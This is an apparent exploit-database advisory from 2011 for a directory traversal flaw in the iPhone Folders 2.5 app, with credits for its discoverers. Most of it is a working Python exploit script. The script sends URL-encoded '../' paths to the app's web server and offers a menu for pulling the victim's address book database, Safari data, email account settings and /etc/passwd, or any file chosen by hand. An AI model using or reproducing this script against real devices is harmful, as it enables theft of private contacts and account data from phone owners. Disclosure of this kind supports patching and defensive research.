iPhone Folders 2.5 Directory Traversal

Published: 2011-02-25 CVE: 2011-02-25 OSVDB-ID: N/A
  1. ----------------------------------------------------------------
  2. Software : iPhone Folders 2.5
  3. Type of vunlnerability : Directory Traversal
  4. Tested On : iPhone 4 (IOS 4.0.1)
  5. Risk of use : High
  6. ----------------------------------------------------------------
  7. Program Developer : http://itunes.apple.com/app/folders-private-file-storage/id287950258?mt=8
  8. ----------------------------------------------------------------
  9. Discovered by : Khashayar Fereidani
  10. Team Website : Http://IRCRASH.COM
  11. Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
  12. English Forums : Http://IRCRASH.COM/forums/
  13. Email : irancrash [ a t ] gmail [ d o t ] com
  14. Facebook : http://facebook.com/fereidani
  15. ----------------------------------------------------------------
  16.  
  17. Exploit:
  18.  
  19. #!/usr/bin/python
  20. import urllib2
  21. def urlread(url,file):
  22.     url = url+"/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f"+file
  23.     u = urllib2.urlopen(url)
  24.     localFile = open('result.html', 'w')
  25.     localFile.write(u.read())
  26.     localFile.close()
  27.     print "file saved as result.html\nIRCRASH.COM 2011"
  28. print "----------------------------------------\n- iPhone Folders 2.5 DT                 -\n- Discovered by : Khashayar Fereidani  -\n- http://ircrash.com/                  -\n----------------------------------------"
  29. url = raw_input("Enter Address ( Ex. : http://192.168.1.101:8080 ):")
  30. f = ["","/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb","/private/var/mobile/Library/Safari","/private/var/mobile/Library/Preferences/com.apple.accountsettings.plist","/private/var/mobile/Library/Preferences/com.apple.conference.plist","/etc/passwd"]
  31. print f[1]
  32. id = int(raw_input("1 : Phone Book\n2 : Safari Fav\n3 : Users Email Info\n4 : Network Informations\n5 : Passwd File\n6 : Manual File Selection\n Enter ID:"))
  33. if not('http:' in url):
  34.     url='http://'+url
  35. if ((id>0) and (id<6)):
  36.     file=f[id]
  37.     urlread(url,file)
  38. if (id==6):
  39.     file=raw_input("Enter Local File Address : ")
  40.     urlread(url,file)
  41.  

Other Refrences

EXPLOIT-DB Advistory : http://www.exploit-db.com/exploits/16243/